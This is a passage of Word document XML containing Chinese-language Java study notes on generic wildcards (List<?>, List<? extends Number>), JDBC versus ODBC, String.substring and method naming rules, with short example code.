        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型的，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">number </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都可以作为这个方法的实参，这就是通配符的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FA1C2" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void getData(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List&lt;?&gt; data</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD47F8" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println("data :" + </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25810">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data.get(0)</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BEF3A5" w14:textId="77777777" w:rsidR="00F25810" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E910C08" w14:textId="2F95F921" w:rsidR="00DC6A45" w:rsidRDefault="00F25810" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4863F" w14:textId="57FEECA9" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C9FE10" w14:textId="05249085" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C8F696" w14:textId="2FC41F99" w:rsidR="00DC2BE0" w:rsidRDefault="00854CAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00271DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型通配符上限通过形如</w:t>
      </w:r>
      <w:r w:rsidRPr="00271DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00271DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来定义，如此定义就是通配符泛型值接受</w:t>
      </w:r>
      <w:r w:rsidRPr="00271DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Number</w:t>
      </w:r>
      <w:r w:rsidRPr="00271DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>及其下层子类类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC89716" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058F73E" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011CD9B" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class GenericTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609831C" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F78DCF" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508005C" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        List&lt;String&gt; name = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02B22C" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        List&lt;Integer&gt; age = new ArrayList&lt;Integer&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A196D" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        List&lt;Number&gt; number = new ArrayList&lt;Number&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E4377" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEF00B" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        name.add("icon");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB983C" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        age.add(18);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBFF27" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        number.add(314);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B784E56" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51622AE8" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        //getUperNumber(name);//1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14F540" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        getUperNumber(age);//2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45117277" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        getUperNumber(number);//3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49610D61" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B2D63" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E18FF0F" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFDE953" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF32B0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getData(List&lt;?&gt; data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECC6D4" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println("data :" + data.get(0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18949D44" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18620310" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C29A0" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void getUperNumber(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF32B0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>List&lt;? extends Number&gt; data</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A758410" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          System.out.println("data :" + data.get(0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395848B6" w14:textId="77777777" w:rsidR="006D6467" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532CBD43" w14:textId="0AEA3201" w:rsidR="00DC2BE0" w:rsidRDefault="006D6467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C03A0C" w14:textId="137F9C07" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21917ED4" w14:textId="65BB4D07" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D86E05B" w14:textId="1A59E298" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0556AB67" w14:textId="68FA3B26" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BC0B80" w14:textId="63122083" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49763AD3" w14:textId="57BB8672" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50219C6E" w14:textId="347AF9B5" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCA751C" w14:textId="2DFBA3A4" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C196C8" w14:textId="02C24616" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72075BC8" w14:textId="1F5904CB" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351990FA" w14:textId="77777777" w:rsidR="00DC2BE0" w:rsidRDefault="00DC2BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A75D562" w14:textId="77777777" w:rsidR="00CE036E" w:rsidRDefault="00CE036E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518620E5" w14:textId="77777777" w:rsidR="004B47C0" w:rsidRDefault="004B47C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30836621" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>odbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1C5E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.php.cn/mysql-tutorials-414951.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541CE17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088C116A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库连接，是一种应用程序编程接口，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言连接数据库的库，是代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0084C6CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>odbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（开放式数据库连接）是一个程序，会和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种平台相关。对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而言，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要考虑这类问题，相比于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>odbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更加高校、贴近</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CBA8A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023BF10A" w14:textId="77777777" w:rsidR="004034C2" w:rsidRDefault="004034C2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C1B4CB" w14:textId="77777777" w:rsidR="004034C2" w:rsidRDefault="004034C2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486EEF65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="720" w:name="_Toc159780149"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="720"/>
    </w:p>
    <w:p w14:paraId="62E2E27C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3517A55C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public String substring(int beginIndex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F8CFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640CC8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public String substring(int beginIndex, int endIndex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF44D16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3E153E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1B39A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">beginIndex -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>起始索引（包括）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14111C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">endIndex -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束索引（不包括）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE123E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2A5E3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="721" w:name="_Toc159780150"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w14:paraId="536DE210" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的命名规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3986578E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D9B0F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的名字的第一个单词应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以小写字母作为开头，后面的单词则用大写字母开头写，不使用连接符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addPerson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766A70E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下划线可能出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> JUnit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>测试方法名称中用以分隔名称的逻辑组件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。一个典型的模式是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
